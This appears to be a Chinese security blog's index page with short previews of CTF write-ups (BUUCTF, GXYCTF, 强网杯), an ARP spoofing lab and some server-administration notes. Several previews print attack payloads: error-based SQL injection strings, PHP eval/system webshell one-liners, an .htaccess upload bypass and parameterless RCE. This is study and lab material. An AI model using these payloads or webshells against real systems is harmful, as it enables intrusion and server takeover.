16k 14 分钟

# 重要知识点 # 10 种常见报错函数 'and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)-- 'and extractvalue(1,concat(0x7e,(select(database()))))-- 'or EXP(~(SELECT(*)from(select(database())a))# 'or (select 2 from (select count(*),concat(database(),floor(rand(0)*2)) x from...
2.4k 2 分钟

GXYCTF2019 禁止套娃 本题考点: 无参数 RCE 对 PHP 函数的了解 # 知识点 无参数 RCE eval($_GET['exp']); 参考链接: https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/# 什么是无参数函数 RCE 1. 利用超全局变量进行 bypass,进行 RCE 2. 进行任意文件读取 形式: if(';' === preg_replace('/[^\W]+\((?R)?\)/', '',...
1.9k 2 分钟

题目名称 [强网杯 2019] 高明的黑客 本题考点: python 代码能力 php 代码能力 访问压缩包内 php 文件,传入参数未报错且具有返回值 存在形如 $_GET['ganVMUq3d'] = ' '; eval($_GET['ganVMUq3d'] ?? ' '); $_GET['jVMcNhK_F'] = ' '; system($_GET['jVMcNhK_F'] ?? ' '); $_GET['cXjHClMPs']...
1.1k 1 分钟

题目名称 [RoarCTF 2019]Easy Java 本题考点: Servlet 的访问流程 java web 工程目录结构 # 前置知识 1.WEB-INF/web.xml 信息泄露 2.java web 工程目录结构 3.servlet 访问 url 映射配置 由于客户端是通过 URL 地址访问 Web 服务器中的资源,所以 Servlet 程序若想被外界访问,必须把 Servlet 程序映射到一个 URL 地址上,这个工作在 web.xml 文件中使用 <servlet> 元素和 < servlet-mapping...
782 1 分钟

# 前言 定了学习计划,开始搭建相关的环境,这里做一下简单的过程叙述。 # 过程 # 安装 docker apt install docker.io apt install python3-pip pip install docker-compose # 安装 portainer (docker 的可视化) docker pull portainer/portainer docker run -d -p 9000:9000 -v /var/run/docker.sock:/var/run/docker.sock --restart=always --name prtainer...
220 1 分钟

[GXYCTF2019]BabyUpload png 文件不许上传,尝试上传 jpg 修改后缀名为.htaccess,文件内容为 SetHandler application/x-httpd-php 上传一句话木马 <?php eval($_POST[cmd]);?> 失败,换一种方式 <script language='php'>eval($_POST[a]);</script> 上传成功,蚁剑连接一下,在根目录找到 flag
1.3k 1 分钟

发现防火墙无法启动 6月 13 23:47:40 localhost.localdomain systemd[1]: Failed to start firewalld - dynamic firewall daemon. # 原因一: 在网上查了资料,说是由于系统里面安装的 python 版本原因。/usr/sbin/firewalld 文件头部的 python 版本和安装的 python 版本不一致导致的。 1. 先查看 linux 系统的 Python 版本 [root@localhost xinetd.d]# python --version Python 2.7.5 1 查看...
433 1 分钟

今天在修防火墙的时候,看一下日志 防火墙开启失败,看了看日志。 journalctl -xe 偶然发现有人在爆破 ssh,解决方法如下。 ssh 公钥登录 生成rsa密钥对 ssh-keygen -b 1024 -t rsa 进入目录 cd ~/.ssh 修改公钥名字 mv id_rsa.pub authorized_keys 设置权限 chmod 600 authorized_keys2 之后把私钥下载出来,就能登录了。 设置公钥登录,禁用密码登录 #禁用密码验证PasswordAuthentication no#启用密钥验证PubkeyAuthentication yes重启...
1.3k 1 分钟

题目名称 [BUUCTF 2018]Online Tool 本题考点: 代码审计 nmap 写文件 # 解题过程 题目的源代码 <?phpif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];}if(!isset($_GET['host'])) {...
1.1k 1 分钟

对于 arp 欺骗和 dns 污染的理解 环境: 物理机 10.60.5.177 kali :10.60.5.198 网关:10.60.5.254 # ARP 欺骗 # arp 欺骗是什么 地址解析协议,即 ARP(Address Resolution Protocol),是根据 IP 地址获取物理地址的一个 TCP/IP 协议。主机发送信息时将包含目标 IP 地址的 ARP 请求广播到局域网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该 IP 地址和物理地址存入本机 ARP 缓存中并保留一定时间,下次请求时直接查询 ARP...